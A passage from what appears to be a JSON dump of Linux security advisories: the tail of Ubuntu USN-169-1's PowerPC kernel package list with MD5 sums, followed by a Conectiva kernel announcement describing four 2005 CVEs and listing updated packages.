\r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/ide-modules-2.6.10-5-power3-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 117104 dcf6f4179e46d476a3a7b1c095d34629\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/ide-modules-2.6.10-5-power4-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 117104 740994399f2cd9249273e5657d3365d6\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/ide-modules-2.6.10-5-powerpc-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 116854 0bad2ab33539f124797b20967db0e251\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/input-modules-2.6.10-5-power3-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 66632 2c0c68f4af7e27f7dd1c1b55f1c04811\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/input-modules-2.6.10-5-power4-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 66628 6791905b4d99c4863e91c7e177281dd6\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/input-modules-2.6.10-5-powerpc-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 66626 de6019978daa56e20067d34863152736\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/ipv6-modules-2.6.10-5-power3-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 142064 5cb5408755a2288c27378280be9eccb7\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/ipv6-modules-2.6.10-5-power4-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 142060 cfa6b645e81bdaea47f87eeac15483bb\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/ipv6-modules-2.6.10-5-powerpc-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 142060 05a5254948ac70029db1835074865750\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/irda-modules-2.6.10-5-power3-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 213964 9219869952bf8531856b574ffa74aa47\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/irda-modules-2.6.10-5-power4-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 213972 35d11ed0bebb6dc163815f7240e8a173\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/irda-modules-2.6.10-5-powerpc-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 213880 3f38edccc43485077cce0ae5091cdb9f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/jfs-modules-2.6.10-5-power3-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 107006 6190487d80141d37710f23557b525e5d\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/jfs-modules-2.6.10-5-power4-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 107002 51da3578513b1233d8a662869f1e9d22\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/jfs-modules-2.6.10-5-powerpc-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 107008 8a188ee440b32700bfb6cfa2f3ac3cf1\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/kernel-image-2.6.10-5-power3-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 1866202 3b03b8f24408f780499a2280ab5914a6\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/kernel-image-2.6.10-5-power4-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 1870588 f88e18156ae774b0c5f65179f86195ae\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/kernel-image-2.6.10-5-powerpc-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 1900896 91464e45b94aef452f98299e6e26af11\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/linux-headers-2.6.10-5-power3-smp_2.6.10-34.4_powerpc.deb\r\n Size/MD5: 249258 980ad70aaf96f3f211e7b19dc7fdd86e\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/linux-headers-2.6.10-5-power3_2.6.10-34.4_powerpc.deb\r\n Size/MD5: 248698 8cafb8a776bd39eb4438a38b78ec3051\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/linux-headers-2.6.10-5-power4-smp_2.6.10-34.4_powerpc.deb\r\n Size/MD5: 248980 6ff81e40b4b746df89d515388127afb4\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/linux-headers-2.6.10-5-power4_2.6.10-34.4_powerpc.deb\r\n Size/MD5: 248514 3fffb5b8a615a1e8446b68ba3df3e39a\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/linux-headers-2.6.10-5-powerpc-smp_2.6.10-34.4_powerpc.deb\r\n Size/MD5: 249542 4ae94182401b51c9186c817afffb1270\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/linux-headers-2.6.10-5-powerpc_2.6.10-34.4_powerpc.deb\r\n Size/MD5: 250280 efefb8b619fedb90072122e93a8b8dd5\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/linux-headers-2.6.10-5_2.6.10-34.4_powerpc.deb\r\n Size/MD5: 6154248 61bd2cb9c413ab3491b9ae9406ccaf50\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/linux-image-2.6.10-5-power3-smp_2.6.10-34.4_powerpc.deb\r\n Size/MD5: 15640972 3d2c68fa213750fd802ca6161502e6a1\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/linux-image-2.6.10-5-power3_2.6.10-34.4_powerpc.deb\r\n Size/MD5: 15206638 d96473548cc05ea4afbaf2936c37d907\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/linux-image-2.6.10-5-power4-smp_2.6.10-34.4_powerpc.deb\r\n Size/MD5: 15634972 b165001d375e4f681b8ccb9489673d23\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/linux-image-2.6.10-5-power4_2.6.10-34.4_powerpc.deb\r\n Size/MD5: 15203542 19ad28dc6b46cbe57a709526de9f1883\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/linux-image-2.6.10-5-powerpc-smp_2.6.10-34.4_powerpc.deb\r\n Size/MD5: 15549118 cdba867e5b824bd8b82488864e92bb37\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/linux-image-2.6.10-5-powerpc_2.6.10-34.4_powerpc.deb\r\n Size/MD5: 15239942 b35e338e07cf4e3082bb6e9ec8981e09\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/linux-patch-ubuntu-2.6.10_2.6.10-34.4_powerpc.deb\r\n Size/MD5: 1350442 2d992bd6f0940acc06fe578a1fe50df4\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/loop-modules-2.6.10-5-power3-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 17356 1fbf0503244841ccc2cca1376f9dfe07\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/loop-modules-2.6.10-5-power4-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 17350 bc18075b026098a566aab6b8d37e5f53\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/loop-modules-2.6.10-5-powerpc-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 17348 b92c52442e03132c35dccd51f031433d\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/md-modules-2.6.10-5-power3-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 213700 e8cbef93f620de254f38b16d94c8cad7\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/md-modules-2.6.10-5-power4-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 213704 1b236bbc45581c8a44c7653d7ef74225\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/md-modules-2.6.10-5-powerpc-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 213456 cf3e1620175520ec68df43c0561a2e1d\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/nfs-modules-2.6.10-5-power3-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 210744 ae1e3581a81798fc87d6a3e12ed8fe68\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/nfs-modules-2.6.10-5-power4-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 210738 c139802d773a9edf9f548f6a411d38bc\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/nfs-modules-2.6.10-5-powerpc-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 210746 2b4741a7b048c9cc2f2fdba21848931c\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/nic-extra-modules-2.6.10-5-power3-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 688402 4d8ba23ea3ccd23b502208203ac8fbb5\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/nic-extra-modules-2.6.10-5-power4-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 688390 cd35997285931206e6edaf9d1c7a48b5\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/nic-extra-modules-2.6.10-5-powerpc-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 686902 1c07f36b031d25333df2203e27bd2bc8\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/nic-firmware-2.6.10-5-power3-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 780756 809f17eac747631ee615564a5220e368\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/nic-firmware-2.6.10-5-power4-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 780760 10241efc871efe6c693008d806012a3f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/nic-firmware-2.6.10-5-powerpc-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 780754 728bb28daa6c1e28b3db25ba498835b5\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/nic-modules-2.6.10-5-power3-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 511224 a69435af26ba591e456ae346043ed409\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/nic-modules-2.6.10-5-power4-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 511208 4ebaad08d54181a924c275743a33182d\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/nic-modules-2.6.10-5-powerpc-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 510820 fdb5ceb1fa2455eea15e2f284a0184c2\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/nic-pcmcia-modules-2.6.10-5-power3-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 257728 41aeb60fee29134ecc400924b9450077\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/nic-pcmcia-modules-2.6.10-5-power4-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 257740 e10ecec651e3769346346672a4b77f74\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/nic-pcmcia-modules-2.6.10-5-powerpc-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 256836 6e57d0e84467c3acf6539501720d89dc\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/nic-shared-modules-2.6.10-5-power3-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 84380 b22a548620e355c07e5a3c8f2591bd78\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/nic-shared-modules-2.6.10-5-power4-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 84376 a8585fd6f9857f27f2f91f15bce13279\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/nic-shared-modules-2.6.10-5-powerpc-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 84348 15c2f42f7ef574dfedb693bec36c711a\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/nic-usb-modules-2.6.10-5-power3-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 60978 054ca4f16b23dff4177f2833d8fb9ea7\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/nic-usb-modules-2.6.10-5-power4-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 60978 108192a0f49156783ed62a55acccde3a\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/nic-usb-modules-2.6.10-5-powerpc-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 60988 7bd3fa858adcdf474a1bc60910e92d35\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/pcmcia-modules-2.6.10-5-power3-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 64992 31ae64714539561096ab9a75095de30b\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/pcmcia-modules-2.6.10-5-power4-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 64982 355505547976c14bbe139ca789e92873\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/pcmcia-modules-2.6.10-5-powerpc-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 64986 e70294d49e5c0d10cbbe0515060cbc0d\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/pcmcia-storage-modules-2.6.10-5-power3-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 5382 c4e5f79a8b43b58b9a3146289c0b1d82\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/pcmcia-storage-modules-2.6.10-5-power4-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 5370 5fd0a5c57471a590421c623262bade18\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/pcmcia-storage-modules-2.6.10-5-powerpc-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 5372 ed68cb495810074bbc2a521c33bf8c7d\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/ppp-modules-2.6.10-5-power3-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 63274 f2cba33f50a346ad93077daf585768a4\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/ppp-modules-2.6.10-5-power4-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 63278 6dce997e84418d3788b6690ee8194060\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/ppp-modules-2.6.10-5-powerpc-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 63236 72b78c7fb5387e3161cf77b5af58afa9\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/reiserfs-modules-2.6.10-5-power3-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 131650 a56e73735c1704020a2ee1fe501e79ba\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/reiserfs-modules-2.6.10-5-power4-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 131656 2dc16c18005bb067d91580778dbae86b\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/reiserfs-modules-2.6.10-5-powerpc-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 131658 7a603fd568409f78b819314afefbf422\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/sata-modules-2.6.10-5-power3-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 70972 f3531083b555d16dd21c2ffb93ff04bc\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/sata-modules-2.6.10-5-power4-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 70966 17be0d275f722064e30435c2bded8b99\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/sata-modules-2.6.10-5-powerpc-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 70954 d687ecc45c59809e129f792deb69e1b4\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/scsi-common-modules-2.6.10-5-power3-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 357314 c87339fdacfb0480e8443fbaf4f139f8\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/scsi-common-modules-2.6.10-5-power4-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 357314 d7acafdee379e58485fbca448221ecbb\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/scsi-common-modules-2.6.10-5-powerpc-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 357316 2993896bd530953dd16bb770bcdd1ff3\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/scsi-core-modules-2.6.10-5-power3-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 80736 2e84feb28afa95eabb5617f2597a061a\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/scsi-core-modules-2.6.10-5-power4-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 80728 faabb575292c21b835a54de5375c3fa2\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/scsi-core-modules-2.6.10-5-powerpc-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 80730 b0759874f1d0c1294419cf0915f2b796\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/scsi-extra-modules-2.6.10-5-power3-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 510996 b81d9bf2579b8fcca23b0aab66d4d28a\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/scsi-extra-modules-2.6.10-5-power4-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 510960 e5b50081348bc3af756216675a891996\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/scsi-extra-modules-2.6.10-5-powerpc-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 510768 1ad843acc177777866d32791c4a69ea2\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/scsi-modules-2.6.10-5-power3-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 389138 2dfe82992d82f2b15afb4ebbe5cedc21\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/scsi-modules-2.6.10-5-power4-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 389106 4d1230c31370601a32295eb387e2bc36\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/scsi-modules-2.6.10-5-powerpc-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 389008 cc4035e395b40d79fa97e7f865dd61b3\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/serial-modules-2.6.10-5-power3-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 63152 bfb4a55b3affd9c4ea770c62133e80c8\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/serial-modules-2.6.10-5-power4-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 63156 2de449953957fdd1b34a3186a54b14c6\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/serial-modules-2.6.10-5-powerpc-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 63036 3e95675cd14231f7768726a93d804160\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/socket-modules-2.6.10-5-power3-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 23352 e9ccec94846d519150a4e47be2beb0cd\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/socket-modules-2.6.10-5-power4-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 23342 dc6cbc746043ac814b01101bb36681a9\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/socket-modules-2.6.10-5-powerpc-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 23106 55dc74da748e726a127836501b681b93\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.10/ufs-modules-2.6.10-5-power3-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 35380 4267ca2d2e8477e2479a0802f1d4765f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.10/ufs-modules-2.6.10-5-power4-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 35384 9cb4434b76aca13bc2c509d370d18358\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.10/ufs-modules-2.6.10-5-powerpc-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 35372 a3377e7a166ee10d093914c04230b068\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/usb-modules-2.6.10-5-power3-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 135020 41efac30647f0d5159d9e9fdaa15e695\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/usb-modules-2.6.10-5-power4-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 135002 6171459fc37d36c95f4f151c9f9ae00e\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/usb-modules-2.6.10-5-powerpc-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 134994 7b7c9557b7b55ee6f31236776b3d9b11\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/usb-storage-modules-2.6.10-5-power3-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 42402 f1c63319e3bb1b2d3a0ad1cdcf5920f7\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/usb-storage-modules-2.6.10-5-power4-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 42396 e403ab194ff512d4b9f8d3d0207803b3\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/usb-storage-modules-2.6.10-5-powerpc-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 42398 27603e03819ba38ab5fd4620a5993be4\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/xfs-modules-2.6.10-5-power3-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 294748 3947fda076c41887667e552f6c95b671\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/xfs-modules-2.6.10-5-power4-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 294752 4d38b285cc09b059d09a585ed7a3644a\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/xfs-modules-2.6.10-5-powerpc-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 294744 49b5f5c12fe75167a0f572b55336ae6b", "edition": 1, "modified": "2005-08-22T00:00:00", "published": "2005-08-22T00:00:00", "id": "SECURITYVULNS:DOC:9541", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:9541", "title": "[USN-169-1] Linux kernel vulnerabilities", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:12", "bulletinFamily": "software", "cvelist": ["CVE-2005-0767", "CVE-2005-0209", "CVE-2005-0210", "CVE-2005-0449"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- --------------------------------------------------------------------------\r\nCONECTIVA LINUX SECURITY ANNOUNCEMENT \r\n- --------------------------------------------------------------------------\r\n\r\nPACKAGE : kernel\r\nSUMMARY : Kernel fixes\r\nDATE : 2005-03-31 12:24:00\r\nID : CLA-2005:945\r\nRELEVANT\r\nRELEASES : 10\r\n\r\n- -------------------------------------------------------------------------\r\n\r\nDESCRIPTION\r\n The Linux kernel is responsible for handling the basic functions of\r\n the GNU/Linux operating system.\r\n \r\n The following vulnerabilities are being fixed in this update:\r\n \r\n 1. CAN-2005-0767[1][2]\r\n Race condition in the Radeon DRI driver for Linux kernel 2.6.8.1\r\n allows local users with DRI privileges to execute arbitrary code as\r\n root.\r\n \r\n 2. CAN-2005-0209[3][4]\r\n Netfilter in Linux kernel 2.6.8.1 allows remote attackers to cause a\r\n denial of service (kernel crash) via crafted IP packet fragments.\r\n \r\n 3. CAN-2005-0449[5][6]\r\n The netfilter/iptables module in Linux before 2.6.8.1 allows remote\r\n attackers to cause a denial of service (kernel crash) or bypass\r\n firewall rules via crafted packets, which are not properly handled by\r\n the skb_checksum_help function.\r\n \r\n 4. CAN-2005-0210[7][8][9]\r\n Netfilter in the Linux kernel 2.6.8.1 allows local users to cause a\r\n denial of service (memory consumption) via certain packet fragments\r\n that are reassembled twice, which causes a data structure to be\r\n allocated twice.\r\n \r\n These other changes have also been made:\r\n - the base kernel has been upgraded to version 2.6.11.\r\n - the NVidia driver has been upgraded to version 7167\r\n - DRBD has been upgraded to version 0.7.10\r\n - the hsfmodem driver has been upgraded to version 7.18.00.03full\r\n - the slmodem driver has been upgraded to version 2.9.10\r\n - the ndiswrapper driver has been upgraded to version 1.1\r\n - lm_sensors has been upgraded to version 2.9.0[11]\r\n\r\n\r\nSOLUTION\r\n It is recommended that all Conectiva Linux users perform the\r\n upgrade.\r\n \r\n IMPORTANT: exercise caution and preparation when upgrading the\r\n kernel, since it will require a reboot after the new packages are\r\n installed. More detailed instructions are available in Portuguese at\r\n our Q&A page[10].\r\n \r\n \r\n REFERENCES\r\n 1.http://linux.bkbits.net:8080/linux-2.6/cset@42088d17CO1mOAfgW4R46WRTm9gkwA\r\n 2.http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0767\r\n 3.http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0209\r\n 4.http://linux.bkbits.net:8080/linux-2.6/gnupatch@41f59581p1swNaow4K1aBglV-q2jfQ\r\n 5.http://cve.mitre.org/cgi-bin/cvename.cgi?name=2005-0449\r\n 6.http://linux.bkbits.net:8080/linux-2.6/gnupatch@41f8843a8ZMCNuP3meYAYnnXd3CO_g\r\n 7.http://cve.mitre.org/cgi-bin/cvename.cgi?name=2005-0210\r\n 8.http://linux.bkbits.net:8080/linux-2.5/gnupatch@41fd96c39V0t4MxKFxE1aZn2f4b5UA\r\n 9.http://linux.bkbits.net:8080/linux-2.5/gnupatch@41fdb84aBJklcjU85o1N1_dsch6HBw\r\n 10.http://www.conectiva.com.br/suporte/pr/sistema.kernel.atualizar.html\r\n 11.http://bugzilla.conectiva.com.br/show_bug.cgi?id=13716\r\n\r\n\r\nUPDATED PACKAGES\r\nftp://atualizacoes.conectiva.com.br/10/SRPMS/kernel26-2.6.11-72032U10_16cl.src.rpm\r\nftp://atualizacoes.conectiva.com.br/10/SRPMS/drbd-utils-0.7.10-71689U10_2cl.src.rpm\r\nftp://atualizacoes.conectiva.com.br/10/SRPMS/kernel26-module-madwifi-2.6.11.72032U10_16cl.20041216-63166U10_5cl.src.rpm\r\nftp://atualizacoes.conectiva.com.br/10/SRPMS/kernel26-module-ndiswrapper-2.6.11.72032U10_16cl.1.1-72907U10_3cl.src.rpm\r\nftp://atualizacoes.conectiva.com.br/10/SRPMS/kernel26-module-nvidia-2.6.11.72032U10_16cl.1.0.7167-71023U10_6cl.src.rpm\r\nftp://atualizacoes.conectiva.com.br/10/SRPMS/kernel26-module-slmodem-2.6.11.72032U10_16cl.2.9.10-63168U10_6cl.src.rpm\r\nftp://atualizacoes.conectiva.com.br/10/SRPMS/xfree86-driver-nvidia-1.0.7167-71010U10_2cl.src.rpm\r\nftp://atualizacoes.conectiva.com.br/10/SRPMS/kernel26-module-drbd-2.6.11.72032U10_16cl.0.7.10-71801U10_5cl.src.rpm\r\n